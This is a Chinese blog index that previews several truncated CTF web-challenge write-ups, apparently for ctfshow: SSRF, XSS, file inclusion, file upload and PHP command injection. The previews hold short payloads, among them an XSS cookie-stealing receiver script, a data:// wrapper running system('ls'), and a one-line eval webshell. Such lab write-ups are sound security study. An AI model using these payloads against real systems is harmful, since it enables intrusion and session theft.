REZEのblog

坐牢日记DAY0。。。

第一章base64编码隐藏打开题目，是一个登录页面 ctrl+u查看源代码，看到 const correctPassword = "Q1RGe2Vhc3lfYmFzZTY0fQ=="; base64解码后，输入密码得到flag CTF{easy_base64} HTTP头注入与上一题相同的页面，但输入密码后显示UA错误，修改UA为ctf-show-brower后，得到flag Base64多层嵌套解码<script> document.getElementById('loginForm').addEventListener('submit', function(e) { const correctPassword = "SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU="; function validatePassword(input) {...

web254<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-02 17:44:47# @Last Modified by: h1xa# @Last Modified time: 2020-12-02 19:29:02# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public...

web89<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 11:25:09# @Last Modified by: h1xa# @Last Modified time: 2020-09-18 15:38:51# @email: h1xa@ctfer.com# @link: https://ctfer.com*/include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; ...

web351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);echo ($result);?> 拿到题目，第一题没有进行任何过滤 可以直接读取到flag url=127.0.0.1/flag.php web352-356一些过滤 法一： 进制转换 127.0.0.1=0x7F000001 法二： 增减 http://127.0.1/...

前言：要做xss，最好是有一个自己的公网服务器，当然也可以选择内网穿透 这里我选择的是phpstudy+花生壳内网穿透 web316首先打开页面，让我们输入内容 尝试输入 <script>alert('111');</script> 出现alert网页消息，说明存在xss漏洞 首先尝试查看cookie <script>alert(document.cookie);</script> 结果显示： PHPSESSID=2jmcsr1d43u48on5b969kqgdg3; flag=you%20are%20not%20admin%20no%20flag 说明我们需要获得cookie并注入，得到真正的flag 首先需要脚本 <?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt",...

web345打开题目，只有一个where is...

web78<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-16 10:52:43# @Last Modified by: h1xa# @Last Modified time: 2020-09-16 10:54:20# @email: h1xa@ctfer.com# @link: https://ctfer.com*/if(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);} 最基础的文件包含，无过滤 使用日志包含或用伪协议读取 伪协议: data ?file=data://text/plain,<?php system("ls");?>?file=data://text/plain,<?php...

web151文件上传的第一题，只有一个绕过 写马 <?= @eval($_POST['x']); ...

web29<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-04 00:12:34# @Last Modified by: h1xa# @Last Modified time: 2020-09-04 00:26:48# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 只过滤了flag和大小写 构造payload ?c=system("ls");?c=system("tac...